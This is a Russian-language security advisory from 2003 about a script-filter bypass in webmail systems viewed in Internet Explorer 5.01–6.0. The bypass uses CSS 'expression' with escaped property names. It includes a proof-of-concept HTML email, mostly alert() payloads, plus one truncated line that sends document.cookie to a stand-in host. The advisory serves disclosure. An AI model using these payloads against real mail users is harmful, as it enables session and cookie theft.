Security Lab

Обход фильтрации JavaScript кода в некоторых Webmail системах в комбинации с Microsoft Internet Explorer

Дата публикации:04.10.2003
Всего просмотров:1468
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer 5.01-6.0 в комбинации с Web mail системами

Описание: Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации.

Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово "expression" используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer.

Пример/Эксплоит:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
               "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
  <title>Webmail test</title>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:expres\sion(alert(1))">
  <style type="text/css">
h1 {
  he\ight:e\xpression(alert(2));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+$
}
  </style>
  <h1 style="width:expression(alert(3))">...</h1>
  <div id="just-for-fun">
    <a href="javascript:window.open(document.location);"
       onmouseover="alert(4)">fireworks</a>
  </div>
</body>
</html>

Решение: Не используйте IE для просмотра HTML почтовых сообщений в Web mail системах.

Ссылки: Webmails + Internet Explorer can create unwanted javascript execution